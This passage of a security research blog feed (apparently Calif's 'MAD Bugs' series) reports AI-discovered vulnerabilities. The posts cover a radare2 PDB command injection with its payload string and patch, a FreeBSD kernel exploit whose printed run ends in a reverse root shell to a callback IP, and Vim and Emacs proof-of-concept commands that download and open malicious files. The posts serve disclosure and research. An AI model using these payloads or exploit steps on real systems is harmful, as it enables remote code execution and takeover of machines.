"fN pdb.my_cool_function my_cool_function"</code></pre></div><p>The <code>f</code> command creates a flag (an offset-name mapping) at an address, and <code>fN</code> sets its &#8220;real name&#8221; &#8212; the original, unsanitized display name stored separately from the flag&#8217;s identifier.</p><p>Finally, there&#8217;s <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/core/cmd_info.inc.c#L1886">idp</a>, which is actually an alias for <code>.idpi*</code>. The dot prefix means &#8220;run this command, then execute the output&#8221;.</p><p>You can probably see where this is going, so let&#8217;s just jump right into the <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/bin/format/pdb/pdb.c#L1452-L1458">implementation</a> of the <code>idpi*</code> command:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// pdb.c:1451 &#8211; filtered_name is sanitized via r_name_filter_dup()
filtered_name = r_name_filter_dup (r_str_trim_head_ro (name));
// pdb.c:1452 &#8211; safe: filtered_name in flag creation
pdb-&gt;cb_printf ("f pdb.%s = 0x%" PFMT64x " # %d %.*s\n", filtered_name, ...);
// pdb.c:1458 &#8211; VULNERABLE: raw `name` from PDB binary data, NOT sanitized
pdb-&gt;cb_printf ("\"fN pdb.%s %s\"\n", filtered_name, name);</code></pre></div><p>By crafting a PDB with a function name like <code>x" ;!open -a Calculator #"</code>, we can break out of the double-quoted command and inject arbitrary r2 commands. Since r2 supports executing system commands, RCE follows trivially.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.x____open__a_Calculator_ = 0x140001000 # 0 .text
"fN pdb.x____open__a_Calculator_ x" ;!open -a Calculator #"</code></pre></div><h2>PoC</h2><div id="youtube2-mmc7A__J_hY" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;mmc7A__J_hY&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/mmc7A__J_hY?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Code: <a href="https://github.com/califio/publications/blob/main/MADBugs/radare2/poc.py">poc.py</a></p><h2>Patch Development: Prompt Commentary</h2><p>In a fresh Claude Code session, I started off with:</p><blockquote><p><strong>Me:</strong> Read the poc and report. Determine when the bug was introduced and produce a patch commit, along with tests that prevent a regression of this bug</p></blockquote><p>The first patch Claude generated fixed the vulnerability, but it broke functionality as well:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">-&#9;pdb-&gt;cb_printf ("\"fN pdb.%s %s\"\n", filtered_name, name);
+&#9;char *safe_name = r_name_filter_dup (name);
+&#9;pdb-&gt;cb_printf ("\"fN pdb.%s %s\"\n", filtered_name, safe_name);
+&#9;free (safe_name);</code></pre></div><p>With that patch applied, the output of <code>idpi*</code> would be:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.x____open__a_Calculator_ = 0x140001000 # 0 .text
"fN pdb.x____open__a_Calculator_ x____open__a_Calculator_"</code></pre></div><p>However, this also strips special characters from legitimate function names, such as <code>std::ostream::operator&lt;&lt;(std::ostream&amp; (*)(std::ostream&amp;))</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001440]&gt; idpi*
f pdb.std::ostream::operator___std::ostream____std::ostream__ = 0x1400014c0 # 0 .text
"fN pdb.std::ostream::operator___std::ostream____std::ostream__ std::ostream::operator___std::ostream____std::ostream__"</code></pre></div><p>Thus, I got Claude to reconsider:</p><blockquote><p><strong>Me:</strong> What is the intent of the fN command and does the fix affect its intended behavior?</p><p><strong>Me:</strong> This is a critical problem. If we sanitize the real name, then this is useless. How can we properly address it?</p></blockquote><p>Claude came back with a clean solution: base64-encode the raw name before interpolation.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Here's what I found. There are two viable approaches:

Option 1: Add base64: support to fN (matches existing pattern)

The flag system already uses base64 in several places:
- fC (flag comment) accepts base64: prefix and decodes it at
cmd_flag.inc.c:2085
- fu serializes realname as base64 at line 1536, and decodes it back at line
1517

But fN itself (line 2163) does not support the base64: prefix &#8212; it takes the
raw string directly via strchr(name, ' ') and passes it straight to
r_flag_item_set_realname.

The fix would be two-sided:

1. Emit side (print_gvars): base64-encode the raw name
2. Receive side (fN handler): detect and decode base64: prefix

This is the cleanest approach because it completely avoids the parsing problem
&#8212; base64 output contains only [A-Za-z0-9+/=], which has zero overlap with r2
metacharacters.</code></pre></div><p>Satisfied with the approach, I opened a <a href="https://github.com/radareorg/radare2/pull/25731">PR with Claude&#8217;s changes</a> and waited for the maintainers to respond.</p><h2>Resolution</h2><p>About an hour later, a maintainer pointed out that the vulnerability could be fixed more simply &#8212; by prefixing the <code>fN</code> command with a single quote (<code>'</code>), which disables special character processing in r2.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext"># Safe - no calc popped
'fN pdb.x____open__a_Calculator_ x;!open -a Calculator #</code></pre></div><p>Nonetheless, they recognized it as a real and critical vulnerability, and agreed that the base64 prefix was a worthwhile addition.</p><p>The PR was <a href="https://github.com/radareorg/radare2/commit/0e38152560e689327a74d2944fa45ba7afd4cb33">merged</a>, and string sanitization was <a href="https://github.com/radareorg/radare2/commit/253587680e000266e94cbf98c27a17ada4cd29e9">further enhanced</a> in a follow-up commit &#8212; likely part of a broader effort to address the spate of recent command injection vulnerabilities.</p><h2>Conclusion</h2><p>We are now in an era where AI can rapidly discover and exploit bugs in large, complex open-source projects. Constructing a valid PDB file would have taken me at least a few hours manually. Claude did it in under 30 minutes.</p><p>That said, finding bugs is the easy part. Claude just needs to identify a possible injection site, trace how to reach it, and develop a PoC it can verify and iterate on.</p><p>Patching is harder. It requires a much deeper understanding of the project, not just where the vulnerability occurs, but why the surrounding code is designed the way it is. In this case, Claude&#8217;s first patch was technically correct but semantically wrong: it fixed the injection without understanding what fN was actually for. It took explicit pushback to get to a solution that was both safe and useful.</p><p>That dynamic is worth keeping in mind. AI-assisted vulnerability research compresses the timeline dramatically, but the human still has to understand the system well enough to know when a fix is incomplete. 
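</p><p>Claude&#8217;s zero-overlap claim for the base64 transport is also easy to verify independently. A standalone Python check (not the r2 code), fed the PoC&#8217;s own attack string, shows the encoding excludes every r2 metacharacter while still round-tripping the name exactly:</p>

```python
import base64
import string

# the attack-style name from the PoC: quotes, ';', '!', and '#'
raw = 'x" ;!open -a Calculator #'
encoded = base64.b64encode(raw.encode()).decode()

# base64 output only uses [A-Za-z0-9+/=], so none of r2's
# metacharacters can survive into the emitted command line
assert set(encoded) <= set(string.ascii_letters + string.digits + "+/=")

# unlike plain sanitization, decoding recovers the name exactly
assert base64.b64decode(encoded).decode() == raw
```
<p>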
The bottleneck has shifted, from finding bugs to understanding them well enough to fix them properly.</p><p>&#8212;junrong</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Claude Wrote a Full FreeBSD Remote Kernel RCE with Root Shell (CVE-2026-4747)]]></title><description><![CDATA[To our knowledge, this is the first remote kernel exploit both discovered and exploited by an AI.]]></description><link>https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 31 Mar 2026 17:35:54 GMT</pubDate><content:encoded><![CDATA[<p><strong>Timeline:</strong></p><ul><li><p><strong>2026-03-26:</strong> FreeBSD published an advisory for <a href="https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc">CVE-2026-4747, crediting &#8220;Nicholas Carlini using Claude, Anthropic&#8221;</a> for a remote kernel code execution.</p></li><li><p><strong>9:45AM PDT 2026-03-29:</strong> We asked Claude to develop an exploit.</p></li><li><p><strong>5:00PM PDT 2026-03-29:</strong> Claude delivered a working exploit that drops a root shell.</p></li></ul><p><strong>Total time: ~8 hours wall clock. The human was AFK for much of it; Claude&#8217;s actual working time was ~4 hours.</strong></p><p>Claude actually wrote two exploits using two different strategies. Both worked on the first try. Here&#8217;s what it looks like:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;7b98d5b0-d670-481a-8a58-04c891e82ff1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">python3 exploit.py -t 127.0.0.1 --ip 10.0.2.2 --port 4444
==============================================================
  CVE-2026-4747: FreeBSD RPCSEC_GSS Remote Kernel RCE
  Stack overflow &#8594; ROP &#8594; shellcode &#8594; uid 0 reverse shell
==============================================================

  [*] Starting listener on 0.0.0.0:4444...

  Target:   127.0.0.1:2049
  Callback: 10.0.2.2:4444
  SPN:      nfs/freebsd-vuln@TEST.LOCAL

  Shellcode: 432 bytes (54 qwords)
  Delivery:  15 rounds (1 pmap + 14 write)

  [R1/15] pmap_change_prot(BSS, 0x2000, RWX)
  [+] BSS is now RWX

  [R2/15] write (4 qwords &#8594; 0xffffffff8198a800) &#10003;
  [R3/15] write (4 qwords &#8594; 0xffffffff8198a820) &#10003;
  [R4/15] write (4 qwords &#8594; 0xffffffff8198a840) &#10003;
  [R5/15] write (4 qwords &#8594; 0xffffffff8198a860) &#10003;
  [R6/15] write (4 qwords &#8594; 0xffffffff8198a880) &#10003;
  [R7/15] write (4 qwords &#8594; 0xffffffff8198a8a0) &#10003;
  [R8/15] write (4 qwords &#8594; 0xffffffff8198a8c0) &#10003;
  [R9/15] write (4 qwords &#8594; 0xffffffff8198a8e0) &#10003;
  [R10/15] write (4 qwords &#8594; 0xffffffff8198a900) &#10003;
  [R11/15] write (4 qwords &#8594; 0xffffffff8198a920) &#10003;
  [R12/15] write (4 qwords &#8594; 0xffffffff8198a940) &#10003;
  [R13/15] write (4 qwords &#8594; 0xffffffff8198a960) &#10003;
  [R14/15] write (4 qwords &#8594; 0xffffffff8198a980) &#10003;
  [R15/15] write + EXECUTE (2 qwords &#8594; 0xffffffff8198a9a0) &#8594; JUMP 0xffffffff8198a800

  [*] Shellcode delivered and executing.
  [*] kproc_create &#8594; kern_execve('/bin/sh -c ...')
  [*] Reverse shell &#8594; 10.0.2.2:4444

  [*] Waiting for reverse shell...
  [+] Connection from 127.0.0.1:41320
  [+] Got shell!

sh: can't access tty; job control turned off
# id                  
uid=0(root) gid=0(wheel) groups=0(wheel)</code></pre></div><p>Check out the full <a href="https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/exploit.py">exploit</a> and the <a href="https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/write-up.md">write-up</a>. Claude wrote everything itself. Here are the prompts we used (excuse the typos):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;9bb70303-88ec-43f5-bfcd-a4d2589c6cc0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">1. https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc we want to setup a test env for this vulnerability using docker preferably so the docker files can be copied later for easy repro. password for this vm is x , you should setup a vulnerable version of FreeBSD the latest it mentions and then trigger the vulnerability
2. we want to use docker for this not qemu if possible.. we should still be able to connect and debug it the same i assume
3. why does it need to be QEMU and not docker for this to be a real exploit?
4. no just use QEMU then
5. okay now can you maybe generate an entire RCE exploit for this image ?
6. wait what are you compiling? arent we testing it inside of the Fbsd VM using the actual FBSD module as described in the advisory ?
7. i mean why wouldnt you just install a vulnerable version as mentioned in the advisory
8. okay contoninue to trigger this vuln.
9. what old qemu did you kill? we are using qemu in another session as well. do not kill that Linux qemu.
10. why is it running on 2222 2049 and 1111
11. okay now what about getting RCE.
12. tere is no kaslr so it should be easy
13. install ropgadget or what ever you need ... idk
14. no we dont want to reboot? we want a reverse shell as uid 0 if possible ?
15. okay in ../FBSD-001 there is a different remote exploit that gets a shell.. read it for how they constructed the connect back as uid 0 maybe
16. is the ucred write even needed if the proc is uid0 ? and why dont we get a shell ? or can we demon strait somehow a unpriv non root user that elevates to root? but we still want a shell.. as uid0
17. from a remote context aka the exploit should be executed from outside the vm
18. no just continue to get the remote version working. use gdb and hat ever tools you need.
19. you should do this step by step - for the remote version foucs on triggering then getting PC control then the rop.
20. you need to keep notes of our current status and what you have done to get here. thanks.
21. you should verify everything with gdb if you need etc.
22. 1. Pure ROP &#8212; no shellcode needed, but we're stuck on rax&#8594;rdi transfer (no gadget exists in this kernel) how are ou searching for rop gadgets?
23. why do we need kdc ?
24. nope that wont work as we cant do that from a remote exploit context without having accss to the shell
25. dont think we can prestage a /tmp/x ..
26. working means a connectback shell as uid0
27. when you get it workng i want a complete writeup of th evuln, the exploit methodology, the ropchain, the overflow, and how to install and setup a vuln target
for testing
28. i want a shell.
29. wait what do you mean increase nfs threadcount i guess we should use defaults here..
30. no just continue to get the remote version working. use gdb and hat ever tools you need.
31. make the writeup better explaining each step of the exploit and why
32. also # SSH tunnel for Kerberos KDC sshpass -p freebsd ssh -L 8888:127.0.0.1:88 -N -f -p 2222 root@127.0.0.1 is it possible to do without an ssh tunnel ?
33. can you do the forward nstead of ssh tunnel then test the exploit again
34. /tmp/final_exploit hardly looks like the final exploit ...
35. why dont you make a nicer exploit where you can supply a target and cb ip ... and do everything inline in that exploit
36. the rop / shellcode everything ..
37. the writeup feels kind of bare, explain the shellcode as if the reader has never seen FBSD001 also what do you mean the "bruteforce" version?
38. also retest and verify it works
39. update the writeup to tell how to also setup a vulnerable target using vmware for example without a KDC tunnel
40. how can i boot the qemu and test it
41. why is KDC required? and nfsd ?
42. okay you noted this stuff in the writeup?
43. do you have the prompt log ? i want to see the original prompt for this
44. can you give me back all the prompts i entered in this session</code></pre></div><h2>What Claude Accomplished</h2><p>Going from a vulnerability advisory to a working remote root shell required Claude to solve six distinct problems. It&#8217;s worth noting that FreeBSD made this easier than it would be on a modern Linux kernel: FreeBSD 14.x has no KASLR (kernel addresses are fixed and predictable) and no stack canaries for integer arrays (the overflowed buffer is <code>int32_t[]</code>).</p><ol><li><p><strong>Lab setup</strong>: Stand up a FreeBSD VM with NFS, Kerberos, and the vulnerable kernel module, all configured so the overflow is reachable over the network. Claude knew the VM needed 2+ CPUs because FreeBSD spawns 8 NFS threads per CPU, and the exploit kills one thread per round. This included setting up remote debugging so Claude could read kernel crash dumps.</p></li><li><p><strong>Multi-packet delivery</strong>: The shellcode doesn&#8217;t fit in one packet. Claude devised a 15-round strategy: make kernel memory executable, then write shellcode 32 bytes at a time across 14 packets. In another exploit privately shared with us, Claude used a different strategy: writing a public key to <code>.ssh/authorized_keys</code> instead of a reverse shell, which shortened the exploit to 6 rounds.</p></li><li><p><strong>Clean thread exit</strong>: Each overflow hijacks an NFS kernel thread. Claude used kthread_exit() to terminate each thread cleanly, keeping the server alive for the next round.</p></li><li><p><strong>Offset debugging</strong>: The initial stack offsets from disassembly were wrong. Claude sent De Bruijn patterns (a common technique, but a term we hadn't heard of before reading the writeup), read the crash dumps, and corrected the offsets.</p></li><li><p><strong>Kernel-to-userland transition</strong>: NFS threads can&#8217;t run userland programs. 
Claude created a new process via <code>kproc_create()</code>, used <code>kern_execve()</code> to replace it with <code>/bin/sh</code>, and cleared the <code>P_KPROC</code> flag so the process could transition to user mode.</p></li><li><p><strong>Hardware breakpoint bug</strong>: The child process kept crashing with a debug exception. Claude traced this to stale debug registers inherited from DDB and fixed it by clearing DR7 before forking.</p></li></ol><h1>Conclusion</h1><p>Computers have always been able to find bugs in software. Fuzzers like AFL and syzkaller have been discovering kernel vulnerabilities for over a decade. But finding a bug and exploiting it are very different things. Exploit development requires understanding OS internals, crafting ROP chains, managing memory layouts, debugging crashes, and adapting when things go wrong. This has long been considered the frontier that only humans can cross.</p><p>Each new AI capability is usually met with &#8220;AI can do Y, but only humans can do X.&#8221; Well, for X = exploit development, that line just moved.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: vim vs emacs vs Claude]]></title><description><![CDATA[We asked Claude to find a bug in Vim. It found an RCE. Just open a file, and you&#8217;re owned. We joked: fine, we&#8217;ll switch to Emacs. 
Then Claude found an RCE there too.]]></description><link>https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Mon, 30 Mar 2026 20:33:53 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!IDy_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>It started like this:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IDy_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IDy_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 424w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 848w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1272w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1456w" sizes="100vw"><img 
src="https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" width="360" height="592.781954887218" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1314,&quot;width&quot;:798,&quot;resizeWidth&quot;:360,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IDy_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 424w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 848w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1272w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft 
pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>PoC:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:&quot;95957b4d-0b75-46c3-b062-46083e89fd45&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc</code></pre></div><p>Vim maintainers <a href="https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh">fixed</a> the issue immediately. Everybody is encouraged to upgrade to Vim v9.2.0272.</p><p>Full advisory can be found <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim.md">here</a>. <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim-claude-prompts.txt">The original prompt</a> was simple:</p><blockquote><p>Somebody told me there is an RCE 0-day when you open a file. Find it.</p></blockquote><p>This was already absurd. But the story didn&#8217;t end there:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bU3_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bU3_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 424w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 848w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1272w, 
https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png" width="334" height="269.5438596491228" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:460,&quot;width&quot;:570,&quot;resizeWidth&quot;:334,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bU3_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 424w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 848w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1272w, 
https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1456w" sizes="100vw"></picture></div></a></figure></div><p>PoC:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:&quot;05969e29-896f-46d5-94f3-ed465313270d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">wget https://github.com/califio/publications/raw/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/emacs-poc.tgz
tar -xzpvf emacs-poc.tgz
emacs emacs-poc/a.txt
cat /tmp/pwned</code></pre></div><p>We immediately reported the bug to GNU Emacs maintainers. The maintainers declined to address the issue, attributing it to git.</p><p>The full advisory is <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/Emacs.md">here</a>. <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/emacs-claude-prompts.txt">The prompt</a> this time:</p><blockquote><p>I&#8217;ve heard a rumor that there are RCE 0-days when you open a txt file without any confirmation prompts.</p></blockquote><hr><p>So how do you make sense of this? How do we professional bug hunters make sense of this? It feels like the early 2000s. Back then, a kid could hack anything with SQL injection. Now, with Claude.</p><p>And friends, to celebrate this historic moment, we&#8217;re launching <em><a href="https://blog.calif.io/p/mad-bugs-month-of-ai-discovered-bugs">MAD Bugs: Month of AI-Discovered Bugs</a></em>. From now through the end of April, we&#8217;ll be publishing more bugs and exploits uncovered by AI. Watch this space; more fun stuff is coming!</p>]]></content:encoded></item><item><title><![CDATA[Reverse engineering Apple’s silent security fixes]]></title><description><![CDATA[I grabbed the latest iOS update, and diffed it with ipsw. The diff reveals at least two security-relevant changes that were shipped quietly.]]></description><link>https://blog.calif.io/p/reverse-engineering-apples-silent</link><guid isPermaLink="false">https://blog.calif.io/p/reverse-engineering-apples-silent</guid><pubDate>Fri, 27 Mar 2026 06:43:50 GMT</pubDate><enclosure 